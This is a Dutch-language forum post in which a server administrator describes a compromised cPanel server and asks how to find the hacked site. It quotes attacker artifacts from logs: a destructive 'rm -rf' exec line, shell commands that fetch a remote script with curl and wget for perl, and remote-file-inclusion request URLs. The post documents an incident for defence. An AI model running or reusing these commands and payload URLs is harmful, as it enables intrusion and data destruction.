Cpanel server van een kennis van me.
Redelijk beveiligd, csf en lfd draaiende, tmp gemount als noexec.
Ik zag gisteren in de /tmp directory een script genaamd rm.txt me de volgende inhoud:
Deze zie ik ook vandaag al een paar keer terugkomen maar wordt door csf automatisch weer weggehaald.Code:exec("rm -rf *siti* && rm rm.txt");
Nu kwam er ook een hoge cpu load email en zag ik het volgende:
Er is echter geen bestand v6ircscan.txt te vinden op de server.Code:nobody 11836 0.0 0.7 34416 16116 ? S 15:35 0:04 \_ /usr/local/apache/bin/httpd -k start -DSSL nobody 32023 0.0 0.0 2448 1012 ? S 17:00 0:00 | \_ sh -c curl -O http://ecology45.t35.com/v6ircscan.txt;perl v nobody 32024 0.0 0.0 5316 1624 ? S 17:00 0:00 | \_ curl -O http://ecology45.t35.com/v6ircscan.txt nobody 12616 0.0 0.7 31060 14444 ? S 15:42 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL nobody 31791 0.0 0.0 2448 1012 ? S 17:00 0:00 | \_ sh -c cd /var/tmp;wget http://ecology45.t35.com/v6ircscan.t nobody 31792 0.0 0.0 5220 1312 ? S 17:00 0:00 | \_ wget http://ecology45.t35.com/v6ircscan.txt
Dit stond in de acces_log van apache:
Ik krijg er geen vinger achter van welke site of via welke site dit allemaal geprobeerd wordt want ik neem aan dat een van de site op de server gehacked is.Code:127.0.0.1 - - [19/May/2009:16:38:57 +0200] "GET /?p=http://ecology45.t35.com/idv6.txt%250D%3f%3f HTTP/1.1" 200 3474 127.0.0.1 - - [19/May/2009:16:38:57 +0200] "GET /?p=aboutus//%3fp=http://ecology45.t35.com/idv6.txt%250D%3f%3f HTTP/1.1" 200 3474
Men is er nog steeds mee bezig want ik zie telkens opnieuw meldingen dat er een rm.txt in de /tmp gezet wordt die csf telkens weer weghaald.
Hoe krijg ik het snelste gevonden waar dit vandaan komt zodat ik het stoppen kan?

Likes:


Quote

